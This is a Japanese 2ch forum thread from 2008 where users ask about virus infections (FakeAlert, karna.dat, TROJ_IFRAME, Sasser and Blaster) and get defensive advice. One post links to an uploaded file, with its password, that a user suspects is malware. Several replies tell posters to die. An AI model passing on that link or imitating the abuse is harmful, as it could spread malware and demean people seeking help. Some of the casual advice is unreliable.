全部 1- 101- 201- 301- 401- 501- 601- 701- 801- 901- 最新50
【ウィルス情報質問 総合スレッド★Part46】

1名無しさん@お腹いっぱい。sage2008/10/20(月) 22:57:50
前スレ = 【ウィルス情報質問 総合スレッド★Part45】
http://pc11.2ch.net/test/read.cgi/sec/1210245681/

★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
2名無しさん@お腹いっぱい。sage2008/10/20(月) 23:00:05
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.co.jp/home/
 製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)http://www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3名無しさん@お腹いっぱい。sage2008/10/20(月) 23:00:54
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
4名無しさん@お腹いっぱい。sage2008/10/20(月) 23:01:59
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。

ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜

サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security
5名無しさん@お腹いっぱい。sage2008/10/20(月) 23:02:41
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
6名無しさん@お腹いっぱい。sage2008/10/20(月) 23:03:36
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
7名無しさん@お腹いっぱい。sage2008/10/20(月) 23:04:31
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット
8名無しさん@お腹いっぱい。sage2008/10/20(月) 23:05:12
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part67
http://tmp7.2ch.net/test/read.cgi/download/1209106638/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト最強決定戦!
http://pc11.2ch.net/test/read.cgi/sec/1202521143/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part14
http://pc11.2ch.net/test/read.cgi/sec/1198013147/
9名無しさん@お腹いっぱい。sage2008/10/20(月) 23:06:00
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります

カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html

関連スレッド
無償オンラインスキャンpart3【ウイルス撲滅】
http://pc11.2ch.net/test/read.cgi/sec/1223797859/

※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします
10名無しさん@お腹いっぱい。sage2008/10/20(月) 23:10:40
関連スレッド
フリーのアンチウイルスソフト Part18
http://pc11.2ch.net/test/read.cgi/sec/1223134635/
セキュリティ初心者質問スレッドpart113
http://pc11.2ch.net/test/read.cgi/sec/1222443322/
一番いいセキュリティソフトはなんだ!!Part58
http://pc11.2ch.net/test/read.cgi/sec/1221538386/
☆☆トロイの木馬☆☆5台目
http://pc11.2ch.net/test/read.cgi/sec/1215569127/
【PFW】フリーファイアウォールスレPart17
http://pc11.2ch.net/test/read.cgi/sec/1215307975/
【緊急!】ウイルス即行駆除方法【助けて!】Part3
http://pc11.2ch.net/test/read.cgi/sec/1214830385/
【分析】HijackThis【研究】
http://pc11.2ch.net/test/read.cgi/sec/1091346741/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc11.2ch.net/test/read.cgi/sec/1086494732/
sasser【スタコラサッサ】sasser Part2
http://pc11.2ch.net/test/read.cgi/sec/1083839516/
アンチウィルスソフトのウィルス誤検出
http://pc11.2ch.net/test/read.cgi/sec/1027753135/

関連スレは次スレに移行してる場合もあります。

質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
11名無しさん@お腹いっぱい。2008/10/20(月) 23:53:52
昨日から「GMO MEDIA」って会社が我が家のパソコンのお気に入りを書き換えようとして不正アクセスしてくるんだが対処法あります?
一応ウィルスバスターは先週から使ってるんだが…

あと不正アクセスが酷くてかネット回線に繋がらない…
12名無しさん@お腹いっぱい。2008/10/22(水) 00:09:25
>>1
13AntiVirus ◆UiFxBJwtGk sage2008/10/22(水) 02:05:00
Virus.gr 検出率テスト 2008-06, 1-21 Ιουν?ου
http://www.virus.gr/portal/
http://www.virus.gr/portal/content/2008-06%2C-1-21-%CE%B9%CE%BF%CF%85%CE%BD%CE%AF%CE%BF%CF%85

ウィルスウオッチャー (Virus.grに関する説明)
http://virus-watcher.net/archives/2007/05/post_4.htm

1. G DATA 2008 ?κδοση 18.2.7310.844 - 99.05%
2. F-Secure 2008 ?κδοση 8.00.103 - 98.75%
3. TrustPort ?κδοση 2.8.0.1835 - 98.06%
4. Kaspersky ?κδοση 8.0.0.357 - 97.95%
5. eScan ?κδοση 9.0.742.1 - 97.44%
6. The Shield 2008 - 97.43%
7. AntiVir ?κδοση 8.1.00.331 Premium - 97.13%
8. Ashampoo ?κδοση 1.61 - 97.09%
9. Ikarus ?κδοση 1.0.82 - 96.05%
10. AntiVir ?κδοση 8.1.00.295 Classic - 95.54%
11. AVG ?κδοση 8.0.100 Free - 94.85%
12. BitDefender 2008 ?κδοση 11.0.16 - 94.70%
13. Avast ?κδοση 4.8.1201 Professional - 93.78%
14. Nod32 ?κδοση 3.0.650.0 - 93.36%
15. F-Prot ?κδοση 6.0.9.1 - 91.87%
16. BitDefender ?κδοση 10 Free - 91.32%
17. ArcaVir 2008 - 88.65%
18. Norman ?κδοση 5.92.08 - 87.72%
19. Vba32 ?κδοση 3.12.6.6 - 87.21%
20. McAfee Enterpise ?κδοση 8.5.0i - 86.57%
21. McAfee ?κδοση 12.0.177 - 86.39%
22. Rising AV ?κδοση 20.46.52 - 85.87%
23. Norton 2008 - 83.34%
24. Dr. Web ?κδοση 4.44.5 - 82.87%
25. Antiy Ghostbusters ?κδοση 5.2.3 - 80.23%
14AntiVirus ◆UiFxBJwtGk 2008/10/22(水) 02:05:37
26. VirusBuster ?κδοση 5.002.62 - 77.19%
27. Outpost ?κδοση 6.0.2294.253.0490 - 75.35%
28. V3 Internet Security ?κδοση 2008.05.31.00 - 75.23%
29. ViRobot Expert ?κδοση 5.5 - 74.50%
30. Virus Chaser ?κδοση 5.0a - 73.65%
31. A-squared Anti-Malware ?κδοση 3.5 - 71.66%
32. PC Tools ?κδοση 4.0.0.26 - 69.82%
33. Trend Micro Antivirus+Antispyware 2008 ?κδοση 16.10.1079 - 67.28%
34. Iolo ?κδοση 4.325 - 63.98%
34. Panda 2008 ?κδοση 3.01.00 - 61.41%
36. Sophos Sweep ?κδοση 7.3.2 - 54.71%
37. ClamWin ?κδοση 0.93 - 54.68%
38. CA Anti-Virus ?κδοση 9.00.170 - 51.08%
39. Quick Heal ?κδοση 9.50 - 47.97%
40. Comodo ?κδοση 2.0.17.58 - 43.15%
41. Trojan Hunter ?κδοση 5.0.962 - 31.39%
42. Solo ?κδοση 7.0 - 21.10%
43. Protector Plus ?κδοση 8.0.C03 - 20.14%
44. PCClear ?κδοση 1.0.8.0 - 19.63%
45. AntiTrojan Shield ?κδοση 2.1.0.14 - 14.74%
46. Trojan Remover ?κδοση 6.6.9 - 13.49%
47. VirIT ?κδοση 6.2.94 - 8.63%
48. True Sword ?κδοση 4.2 - 3.42%
49. Abacre ?κδοση ?κδοση 1.4 - 0.00%
15名無しさん@お腹いっぱい。2008/10/23(木) 19:22:18
【使用OS】 「windows2000」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2007(8.91.1002/5.613.00)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「ウィルスバスター2007の機能を使用」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_IFRAME.CP」
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FIFRAME%2ECP&VSect=S

某2chスレブログの画像リンクをクリックしたら、ウィルスに感染したとのポップアップが出力しました。
jpgを開くことによってウィルスに感染するケースがあるとは知らなかったので驚きました。
初めて感染してしまったみたいで、私が行った対応で正しいのか教えてください。

感染した旨のポップアップ出力。
→ウィルス情報ページで対応方法を確認し、Temporary Internet Filesの削除
→ウィルスバスターの”隔離ファイルの管理”から、該当のファイルを削除
→スキャンを行い、ウィルスが検出されないことを確認。


トレンドマイクロのウィルス情報で、過去「TROJ_IFRAME.CP」の誤検知があったようですが、
(現在のパターンファイルでは対応済みらしいですが)
”隔離ファイルの管理”から削除しても、今改めて確認したら、まだ残ってました。
誤検知で、気にしなくても良いのか。そうでないなら対応方法が心配です。
どうか、教えてください。おねがいします。
1615sage2008/10/23(木) 19:31:45
すみません。少し勘違いしてました。
サイトの画像をクリックして拡大表示しようとした際に感染と出たのですが。
どうやら、”隔離ファイルの管理”に移るのは、サイトの画像をクリックする前のようでした。

1.該当の画像が表示されている、某スレまとめを見る(←ここで隔離ファイルへ)
2.その画像を拡大表示する為にクリック(←感染したポップアップ出力)

こんな感じだと思います。
駆除後に、再度そのサイトを開いた為に”隔離ファイルの管理”に残ったまま と
勘違いしてしまいました。
訂正いたします。
17 ◆0fQkHdNop2 sage2008/10/23(木) 21:41:53
>>15
セキュリティーサポート期間内のWindowsとブラウザーが最新版で
セキュリティーホールがなく、発見された場所がTemporary Internet
Filesならウィルスの心配は99%問題ない。
スパイウェアは変な状況にならねば感染を気にしなくて良いケースが
ほとんど。
18名無しさん@お腹いっぱい。sage2008/10/24(金) 21:52:57
>>14
間違っています。
以上。
↓次どうぞ
1915sage2008/10/25(土) 16:25:42
>>17
レスありがとうございます。
安心しても大丈夫そうですね。

おかげで助かりました。
20ぼるじょあ ◆yBEncckFOU sage2008/10/26(日) 05:01:07
(・3・) エェー こっちもよろしくNE

ぼるじょあ(・3・)質問箱 セキュ板出張所26
http://pc11.2ch.net/test/read.cgi/sec/1223260075/
21名無しさん@お腹いっぱい。2008/10/26(日) 21:15:40
ウィルススキャンで正常なファイルをウィルスと誤認識してしまうことってあるおでしょうか?
シマンテック・ウルスバスター・マカフィーの3社のオンラインスキャンしたら
同じファイルでもウィルスと認識するところとそうじゃないところがあるんだけど
この場合どうしたらよいんでしょうか?
もし正常なファイルなのに削除してしまって問題あったらイヤだし・・・
22名無しさん@お腹いっぱい。sage2008/10/26(日) 22:41:10
どこかに移動して様子見ればいいじゃん
23 ◆N9P3SuvBPo sage2008/10/26(日) 22:48:21
>21
こういう場合、そのファイルのフルパスまたはプロパティ情報を見てご自身で判断する方法があります。
見るところは、主に「作成日」「著作権」「会社名」で良いと思います。
24名無しさん@お腹いっぱい。sage2008/10/26(日) 23:04:53
>>21
つ VirusTotal
つ Jotti's malware scan
25212008/10/26(日) 23:08:22
>>23
「作成日」「著作権」「会社名」とも変なところはなかったです
というか>>21の補足ですが、正確には私の使っているウィルスソフト
「Kingsoft Internet Security」の「UPLive.EXE」という自動更新の
アプリケーション(?)にウィルス反応が出たのですが、
ウィルスソフト自体が感染することもあるのでしょうか?
26212008/10/26(日) 23:11:30
>>24
ありがとうございます
今から調べてみます
27212008/10/26(日) 23:29:37
Jotti's malware scanでスキャンしたら20のうち3つ
(Avast・G DATA・NOD32)でウィルス反応が出ました
1つは「probably a variant of Win32/Genetik 」
2つは「Win32:Jpedrop-B」となっています
28名無しさん@お腹いっぱい。2008/10/27(月) 08:34:10
今までマカフィーつかってきたのだけど、ほかのソフトに乗りかえようと思ったら、XP SP1で使えるソフトが減っている・・・
何かいいのありませんか?
29名無しさん@お腹いっぱい。sage2008/10/27(月) 09:55:18
ネタ・・・だよな?
30名無しさん@お腹いっぱい。sage2008/10/27(月) 16:08:16
>>28
馬鹿は氏ね
31名無しさん@お腹いっぱい。sage2008/10/27(月) 23:20:30
オク板からきました。
マルチですみませんが、おしえてください。

ヤフーのログイン履歴なんですが、

2008年10月24日(金曜日)14時00分47秒 オークション ログイン 成功 127.0.0.1 パソコン

これって何ですか?
32名無しさん@お腹いっぱい。sage2008/10/27(月) 23:28:08
死ね
33名無しさん@お腹いっぱい。sage2008/10/30(木) 01:07:29
このファイルをダブルクリックしてしまいました
http://www1.axfc.net/uploader/Ne/so/35614  pass sage
症状は今のところはっきり現れていません

誰か助けてください。お願い致します
34名無しさん@お腹いっぱい。sage2008/10/30(木) 10:58:26
なんのファイルだったの?
35名無しさん@お腹いっぱい。sage2008/10/30(木) 14:33:06
二つばかり質問よろしいでしょうか
先程delself.batをくらいまして、システムフォルダを検査したところ
Malwareに感染したkarna.datが見つかったので削除したんですが
これでひとまず安心してよいのでしょうか?

それと、最初に再起動をかけられた時から自動アップデートアイコンの横に
赤丸白バッテンアイコンがあるのですが、これは一体何なんでしょうか…

上記二点につきよろしければご教示頂けませんでしょうか
よろしくお願いいたします
36名無しさん@お腹いっぱい。sage2008/10/30(木) 15:07:33
>>35
なんで>>1の質問用テンプレ使わないの?

karna.datしか検出できなかったのならまだ残ってる。
トレイアイコンはVirantixとかFakeAlertとかいうヤツだろ。
37名無しさん@お腹いっぱい。sage2008/10/30(木) 17:18:42
>>36
ご返事ありがとうございます
テンプレが無く失礼しました、改めて質問させてください
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスセキリュティゼロ9.5.0362」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「無し」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Malwareに感染したkarna.dat」

今、Cドライブを検査しているのですが、この場合ですと
どこにウイルスが残留するかお伺いしたいです
この使用ソフトでは検出できないようなウィルスなのでしょうか?
38名無しさん@お腹いっぱい。sage2008/10/30(木) 18:15:41
>>37
セキュリティZEROだと残る可能性が高いね。

>>9のオンラインスキャンを試して見たら?
トレンドマイクロは対応してるらしいから、トレンドフレックスで。
39名無しさん@お腹いっぱい。sage2008/10/30(木) 19:12:53
>>38
ありがとうございます
早速スキャンを試してみています
実は今まで調べていて、brastk.exeとやらをセーフモードで削除してみたのですが
再起動したら相変わらず赤丸バッテンが出てきて、どうもよくわかりません
このスキャンでキレイになってくれると嬉しいです
40 ◆0fQkHdNop2 sage2008/10/30(木) 21:52:21
>>35
>赤丸白バッテンアイコン


多分、windowsのセキュリティーセンターのアイコンで「赤」は緊急警告
の表示だと思います。(実際に見てないので断言はできませんけど)
ポインターを、そのアイコンの上に軽く当ててセキュリティー警告らしき
表示がでればアイコンをクリックすればwindowsセキュリティーセンターの
画面が表示されて、何をなすべきか表示されると思います。
41 ◆0fQkHdNop2 sage2008/10/30(木) 22:14:41
検索して調べたらkarna.datってダウンローダーみたいですね。

VirSCAN.org記事参照
http://virscan.org/report/8989f49db836649a3ae0cd6dac7332f5.html


downloaderだったら、どこで発見されたかという事とセキュリティーホール
の有無が問題です。
ネットに関係するすべてのソフトが最新でセキュリティーホールがなく
そのマルウェアをクリックせず、発見場所がインターネットのキャッシュ
なら多分セーフですが、そうでないなら危険かもしれません。
危険な場合は、リカバリ推奨ですが、どうしても嫌なら「システムの復元」
ができれば「システムの復元」して、一旦、「システムの復元」無効にし
再度有効、そして、すべてのソフトupdate。
42名無しさん@お腹いっぱい。sage2008/10/30(木) 23:15:01
>>40-41
ご助言ありがとうございます
ひとまずオンラインスキャンが終わってから
諸々対応してみたいと思います

ご協力いただいた皆様も、ありがとうございました
43名無しさん@お腹いっぱい。sage2008/10/31(金) 00:41:44
連レスですが、無事解決いたしました
スキャンの結果%Windir%\drivers\beep.sys、%System%\dllcache\beep.sys、
%System%\drivers\beep.sysの三つからウイルスが見つかりまして
削除、再びbrastk.exeも削除で赤丸バッテンは消えました
挙動にも問題ございません
>>36でご指摘のとおりフェイクアラートだったようです
http://www.avira.com/jp/threats/section/fulldetails/id_vir/4360/tr_fakealert.hc.html

大変お騒がせ致しました
44名無しさん@お腹いっぱい。2008/11/01(土) 22:04:16
最近サイトを開くとttp://82.98.235.113
ファイル未検出とかいうのが一緒にでてくるん
ですけどこれはウィルスと関係あるのですか?
パソコン初心者でなにもわかりません
お願いします。
45名無しさん@お腹いっぱい。sage2008/11/01(土) 22:16:29
185 名前:ひよこ名無しさん[] 投稿日:2008/11/01(土) 22:14:11 ID:FXGkGk3i
最近サイトを開くとttp://82.98.235.113
ファイル未検出とかいうのが一緒にでてくるん
ですけどこれはウィルスと関係あるのですか?
パソコン初心者でなにもわかりません
お願いします。

46名無しさん@お腹いっぱい。sage2008/11/02(日) 00:12:47
>>41
システムの復元ってw
47名無しさん@お腹いっぱい。sage2008/11/03(月) 19:48:02
>>41
死んでくださいね
48名無しさん@お腹いっぱい。2008/11/03(月) 20:38:15
>>43
おかしいね。
そのAviraのサイト
ttp://www.avira.com/jp/threats/section/fulldetails/id_vir/4360/tr_fakealert.hc.html
の説明では、そのフェイクアラートのMD5チェックサムは
9d40e58d4b91df1fdf7afd3b05dba6d6
で、VirusTotalではウィルスセキリュティZEROの元になってるK7AntiVirus
でもTrojan.Win32.Malware.1として対応してるんだけど。
ttp://www.virustotal.com/analisis/84185c0f93be9207d20747e54e4bdcab
49名無しさん@お腹いっぱい。2008/11/04(火) 20:40:27
Au_.exeとかいうのが突然インターネット接続を要求してきたんですけど、これなんだかわかりますか?
パスはC:\Documents and Settings\ユーザー名\Localsettings\temp\~nsu.tmp\AU_.EXEです。
ググってみたらほとんど英語のサイトばかりで、他のプロセスを削除するだとか、HTTPプロトコルを使って他のユーザーと通信するだとか書かれていました。
http://answers.yahoo.com/question/index?qid=20080523182806AAAX3E6

英語にもPCにもめっぽう弱いので詳しい被害や対処法がわからなくて困っています。
どなたか優しい方助けてください。
50名無しさん@お腹いっぱい。sage2008/11/04(火) 21:35:25
>>49
一番安全確実なのはリカバリ。
Microsoft updateはカスタムでIE7インストール、その後SP3インストール。
リカバリ後はブラウザーをOperaかFirefox+Noscriptにする事。

どうしても、リカバリが嫌なら、あまり効果を期待はできないが下の方法を試したら?

「システムの復元」ができれば「システムの復元」して、その後
一旦「システムの復元」を無効にして、再度「システムの復元」を
有効にする。それでも悪影響があれば、アダ被記事参考にして
hostファイル対策。
その後、すべてのソフトを最新版にupdate。

http://www.higaitaisaku.com/fukugen.html
http://www.higaitaisaku.com/hosts.html
51名無しさん@お腹いっぱい。2008/11/04(火) 22:04:38
>>50
回答ありがとうございます。
Au_.exeのプロパティを見てみたら、Jwordインストーラーと書いてありました。
IEのツールバーの検索を利用した時に押し付けられたのかもしれません。
お騒がせしてすいませんでした。
52名無しさん@お腹いっぱい。sage2008/11/04(火) 22:37:58
>>51
 それウイルス相当のソフトなので削除が賢明です
53名無しさん@お腹いっぱい。sage2008/11/04(火) 23:11:53
上の方に書いてあったとも思うんですけど
ZIPファイルはダウンロードしただけではスパイウェアやウイルスは感染しないという事で良いでしょうか?
54名無しさん@お腹いっぱい。sage2008/11/05(水) 07:44:09
うん
55名無しさん@お腹いっぱい。2008/11/07(金) 00:57:28
すみません。ショートカットキーです。

とあるサイトを見てからずっとショートカットキーです。、語尾に「ショートカットキー」が付いてくるのですがショートカットキーです。・・・

携帯にもウィルスは付くものなのでしょうか?ショートカットキーです。
どなたか教えてください。ショートカットキーです。
56名無しさん@お腹いっぱい。2008/11/07(金) 01:07:02
>>55
スレチです。
57名無しさん@お腹いっぱい。2008/11/07(金) 16:57:38
株取引.SCR というウイルスをふんで案の定
C:\Windows\Up\[殺人] <ユーザ名>(yyyymmdd-hhmmss)のメール.zip
が作成されたんですが
それを削除して
もう一度ふんでも
なにも起こりません。
こんなもんなんでしょうか?
58名無しさん@お腹いっぱい。sage2008/11/08(土) 00:08:25
基本的なことを質問したいんですが・・

パソコンには ファイアーウォール?というのが元から入ってると思います。
あとセキュリティセンター?もはいってると思うんですが・・
それと セキュリティソフトは全く別の役割をはたすんですか?

ファイアーウォールは基本的には何から守ってくれてるんでしょうか?
あとJCOMでホームページウイルススキャンサービスに入ってるんですが
それだけでは ウイルスからは守られてないんでしょうか?
59名無しさん@お腹いっぱい。sage2008/11/08(土) 00:27:40
>>58
ttp://www.google.co.jp/webhp?sourceid=navclient&hl=ja&ie=UTF-8


      _______                     __
    // ̄~`i ゝ                    `l |
    / /        ,______   ,_____    ________  | |  ____ TM
   | |     ___ // ̄ヽヽ // ̄ヽヽ (( ̄))   | | // ̄_>>
   \ヽ、   |l | |    | | | |    | |  ``( (.  .| | | | ~~
      `、二===-'  ` ===' '  ` ===' '  // ̄ヽヽ |__ゝ ヽ二=''
                         ヽヽ___//   日本
  _____ _____  ______  _______
  |  ウェブ  | | イメージ | | グループ | | ディレクトリ |
